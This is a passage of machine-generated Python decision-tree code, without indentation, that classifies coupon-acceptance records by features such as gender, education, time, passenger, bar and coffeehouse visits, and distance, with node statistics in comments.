if obj[8]<=1.0:
# {"feature": "Gender", "instances": 20, "metric_value": 0.4125, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 12, "metric_value": 0.2727, "depth": 10}
if obj[6]<=3:
# {"feature": "Time", "instances": 11, "metric_value": 0.2525, "depth": 11}
if obj[1]<=3:
# {"feature": "Children", "instances": 9, "metric_value": 0.1852, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>3:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 8, "metric_value": 0.2083, "depth": 10}
if obj[5]<=0:
# {"feature": "Time", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[6]<=0:
return 'True'
elif obj[6]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>1.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]<=1.3264107549745603:
# {"feature": "Education", "instances": 34, "metric_value": 0.444, "depth": 6}
if obj[6]>1:
# {"feature": "Age", "instances": 18, "metric_value": 0.2738, "depth": 7}
if obj[4]<=4:
# {"feature": "Time", "instances": 14, "metric_value": 0.1429, "depth": 8}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Bar", "instances": 4, "metric_value": 0.3333, "depth": 9}
if obj[8]>-1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[8]<=-1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 8}
if obj[1]>3:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[1]<=3:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
# {"feature": "Age", "instances": 16, "metric_value": 0.3571, "depth": 7}
if obj[4]>2:
# {"feature": "Time", "instances": 9, "metric_value": 0.3333, "depth": 8}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.1667, "depth": 9}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 9}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[3]<=1:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.0, "depth": 8}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[2]<=1:
# {"feature": "Bar", "instances": 2281, "metric_value": 0.4567, "depth": 2}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 1601, "metric_value": 0.4408, "depth": 3}
if obj[5]>0:
# {"feature": "Occupation", "instances": 804, "metric_value": 0.3945, "depth": 4}
if obj[7]>1.5424315569353801:
# {"feature": "Time", "instances": 645, "metric_value": 0.4151, "depth": 5}
if obj[1]<=3:
# {"feature": "Coffeehouse", "instances": 565, "metric_value": 0.4343, "depth": 6}
if obj[9]<=2.0:
# {"feature": "Distance", "instances": 447, "metric_value": 0.4578, "depth": 7}
if obj[12]<=2:
# {"feature": "Restaurant20to50", "instances": 352, "metric_value": 0.4701, "depth": 8}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 327, "metric_value": 0.4631, "depth": 9}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 242, "metric_value": 0.4459, "depth": 10}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 174, "metric_value": 0.4624, "depth": 11}
if obj[0]>1:
# {"feature": "Age", "instances": 90, "metric_value": 0.4263, "depth": 12}
if obj[4]<=6:
# {"feature": "Gender", "instances": 83, "metric_value": 0.4108, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[4]>6:
# {"feature": "Gender", "instances": 7, "metric_value": 0.3429, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=1:
# {"feature": "Age", "instances": 84, "metric_value": 0.4503, "depth": 12}
if obj[4]<=2:
# {"feature": "Gender", "instances": 47, "metric_value": 0.4908, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]>2:
# {"feature": "Gender", "instances": 37, "metric_value": 0.3935, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Passanger", "instances": 68, "metric_value": 0.383, "depth": 11}
if obj[0]<=1:
# {"feature": "Age", "instances": 58, "metric_value": 0.3577, "depth": 12}
if obj[4]<=4:
# {"feature": "Gender", "instances": 44, "metric_value": 0.3202, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4317, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[3]<=0:
# {"feature": "Age", "instances": 5, "metric_value": 0.4, "depth": 13}
if obj[4]<=1:
return 'True'
elif obj[4]>1:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 5, "metric_value": 0.2, "depth": 13}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>2:
# {"feature": "Passanger", "instances": 85, "metric_value": 0.455, "depth": 10}
if obj[0]<=2:
# {"feature": "Direction_same", "instances": 73, "metric_value": 0.4729, "depth": 11}
if obj[11]<=0:
# {"feature": "Age", "instances": 50, "metric_value": 0.4387, "depth": 12}
if obj[4]>2:
# {"feature": "Gender", "instances": 32, "metric_value": 0.4023, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Gender", "instances": 18, "metric_value": 0.4722, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 23, "metric_value": 0.475, "depth": 12}
if obj[3]<=0:
# {"feature": "Age", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[4]<=6:
return 'False'
elif obj[4]>6:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 11, "metric_value": 0.2828, "depth": 13}
if obj[4]<=3:
return 'True'
elif obj[4]>3:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[0]>2:
# {"feature": "Age", "instances": 12, "metric_value": 0.2593, "depth": 11}
if obj[4]<=6:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1905, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]>6:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Age", "instances": 25, "metric_value": 0.419, "depth": 9}
if obj[4]<=4:
# {"feature": "Education", "instances": 21, "metric_value": 0.4894, "depth": 10}
if obj[6]<=3:
# {"feature": "Gender", "instances": 12, "metric_value": 0.4167, "depth": 11}
if obj[3]>0:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4167, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Passanger", "instances": 9, "metric_value": 0.4444, "depth": 11}
if obj[0]>1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[3]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[4]>4:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Education", "instances": 95, "metric_value": 0.3455, "depth": 8}
if obj[6]>0:
# {"feature": "Passanger", "instances": 69, "metric_value": 0.2466, "depth": 9}
if obj[0]<=1:
# {"feature": "Restaurant20to50", "instances": 67, "metric_value": 0.2445, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 46, "metric_value": 0.3062, "depth": 11}
if obj[4]>2:
# {"feature": "Gender", "instances": 23, "metric_value": 0.3742, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.2975, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Gender", "instances": 23, "metric_value": 0.1897, "depth": 12}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Age", "instances": 21, "metric_value": 0.0847, "depth": 11}
if obj[4]<=3:
return 'False'
elif obj[4]>3:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1778, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 26, "metric_value": 0.4242, "depth": 9}
if obj[3]>0:
# {"feature": "Age", "instances": 15, "metric_value": 0.3889, "depth": 10}
if obj[4]<=4:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.4583, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>4:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 11, "metric_value": 0.2727, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 6, "metric_value": 0.4444, "depth": 11}
if obj[4]>0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Direction_same", "instances": 118, "metric_value": 0.3094, "depth": 7}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 86, "metric_value": 0.2449, "depth": 8}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 65, "metric_value": 0.176, "depth": 9}
if obj[6]>1:
# {"feature": "Age", "instances": 44, "metric_value": 0.083, "depth": 10}
if obj[4]>2:
# {"feature": "Passanger", "instances": 23, "metric_value": 0.1491, "depth": 11}
if obj[0]<=1:
# {"feature": "Gender", "instances": 14, "metric_value": 0.2413, "depth": 12}
if obj[3]>0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.1852, "depth": 13}
if obj[12]<=2:
return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.2, "depth": 13}
if obj[12]<=2:
return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
elif obj[4]<=2:
return 'False'
else: return 'False'
elif obj[6]<=1:
# {"feature": "Age", "instances": 21, "metric_value": 0.3175, "depth": 10}
if obj[4]<=2:
# {"feature": "Distance", "instances": 15, "metric_value": 0.381, "depth": 11}
if obj[12]>1:
# {"feature": "Passanger", "instances": 14, "metric_value": 0.3429, "depth": 12}
if obj[0]<=1:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4667, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
elif obj[12]<=1:
return 'True'
else: return 'True'
elif obj[4]>2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Passanger", "instances": 21, "metric_value": 0.3464, "depth": 9}
if obj[0]<=2:
# {"feature": "Age", "instances": 16, "metric_value": 0.2396, "depth": 10}
if obj[4]>2:
# {"feature": "Education", "instances": 12, "metric_value": 0.1458, "depth": 11}
if obj[6]>0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.2, "depth": 12}
if obj[12]<=2:
# {"feature": "Gender", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Distance", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[6]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>2:
# {"feature": "Age", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[4]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[6]<=2:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 32, "metric_value": 0.3842, "depth": 8}
if obj[4]>2:
# {"feature": "Distance", "instances": 21, "metric_value": 0.4222, "depth": 9}
if obj[12]<=1:
# {"feature": "Restaurant20to50", "instances": 15, "metric_value": 0.4308, "depth": 10}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 13, "metric_value": 0.4249, "depth": 11}
if obj[6]>2:
# {"feature": "Gender", "instances": 7, "metric_value": 0.381, "depth": 12}
if obj[3]>0:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[0]<=1:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[6]<=2:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[0]<=1:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>2.0:
return 'True'
else: return 'True'
elif obj[12]>1:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.2222, "depth": 10}
if obj[0]>1:
return 'False'
elif obj[0]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[10]<=1.0:
return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Passanger", "instances": 11, "metric_value": 0.1212, "depth": 9}
if obj[0]<=1:
return 'False'
elif obj[0]>1:
# {"feature": "Education", "instances": 3, "metric_value": 0.0, "depth": 10}
if obj[6]>1:
return 'False'
elif obj[6]<=1:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Passanger", "instances": 80, "metric_value": 0.2039, "depth": 6}
if obj[0]<=2:
# {"feature": "Distance", "instances": 76, "metric_value": 0.1805, "depth": 7}
if obj[12]>1:
# {"feature": "Gender", "instances": 50, "metric_value": 0.1036, "depth": 8}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Age", "instances": 22, "metric_value": 0.2143, "depth": 9}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.2984, "depth": 10}
if obj[10]>1.0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1778, "depth": 11}
if obj[6]>1:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.2, "depth": 12}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[9]>0.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.0, "depth": 12}
if obj[6]<=2:
return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Age", "instances": 26, "metric_value": 0.284, "depth": 8}
if obj[4]>2:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.4103, "depth": 9}
if obj[9]<=3.0:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.4167, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3333, "depth": 11}
if obj[3]>0:
# {"feature": "Education", "instances": 6, "metric_value": 0.4167, "depth": 12}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[6]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Education", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]>3.0:
return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.1026, "depth": 9}
if obj[9]<=2.0:
return 'False'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[6]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>2:
# {"feature": "Age", "instances": 4, "metric_value": 0.0, "depth": 7}
if obj[4]>3:
return 'False'
elif obj[4]<=3:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]<=1.5424315569353801:
# {"feature": "Age", "instances": 159, "metric_value": 0.2582, "depth": 5}
if obj[4]<=6:
# {"feature": "Restaurant20to50", "instances": 152, "metric_value": 0.2379, "depth": 6}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 151, "metric_value": 0.2335, "depth": 7}
if obj[11]<=0:
# {"feature": "Education", "instances": 118, "metric_value": 0.1898, "depth": 8}
if obj[6]>0:
# {"feature": "Time", "instances": 66, "metric_value": 0.11, "depth": 9}
if obj[1]>1:
# {"feature": "Coffeehouse", "instances": 40, "metric_value": 0.0467, "depth": 10}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Passanger", "instances": 15, "metric_value": 0.1143, "depth": 11}
if obj[0]<=1:
return 'False'
elif obj[0]>1:
# {"feature": "Gender", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[3]<=1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=1:
# {"feature": "Passanger", "instances": 26, "metric_value": 0.1828, "depth": 10}
if obj[0]<=1:
# {"feature": "Coffeehouse", "instances": 19, "metric_value": 0.0936, "depth": 11}
if obj[9]>1.0:
return 'False'
elif obj[9]<=1.0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.1852, "depth": 12}
if obj[12]>2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2667, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 11}
if obj[12]<=2:
# {"feature": "Coffeehouse", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[9]>1.0:
return 'False'
elif obj[9]<=1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Coffeehouse", "instances": 52, "metric_value": 0.2564, "depth": 9}
if obj[9]<=1.0:
# {"feature": "Distance", "instances": 39, "metric_value": 0.1736, "depth": 10}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 26, "metric_value": 0.2337, "depth": 11}
if obj[0]>1:
# {"feature": "Gender", "instances": 16, "metric_value": 0.0938, "depth": 12}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 13}
if obj[1]<=2:
return 'False'
elif obj[1]>2:
return 'True'
else: return 'True'
else: return 'False'
elif obj[0]<=1:
# {"feature": "Time", "instances": 10, "metric_value": 0.3048, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Distance", "instances": 13, "metric_value": 0.3846, "depth": 10}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4167, "depth": 11}
if obj[0]>1:
# {"feature": "Time", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[1]>2:
return 'False'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=1:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 33, "metric_value": 0.3216, "depth": 8}
if obj[1]<=1:
# {"feature": "Education", "instances": 28, "metric_value": 0.2434, "depth": 9}
if obj[6]<=2:
# {"feature": "Coffeehouse", "instances": 27, "metric_value": 0.2438, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Distance", "instances": 24, "metric_value": 0.2125, "depth": 11}
if obj[12]<=1:
# {"feature": "Gender", "instances": 20, "metric_value": 0.2526, "depth": 12}
if obj[3]>0:
# {"feature": "Passanger", "instances": 19, "metric_value": 0.2659, "depth": 13}
if obj[0]<=1:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[0]<=1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=1:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>2:
return 'True'
else: return 'True'
elif obj[1]>1:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 9}
if obj[6]>0:
# {"feature": "Coffeehouse", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[0]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[12]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>1.0:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[10]>2.0:
return 'True'
else: return 'True'
elif obj[4]>6:
# {"feature": "Distance", "instances": 7, "metric_value": 0.3429, "depth": 6}
if obj[12]<=2:
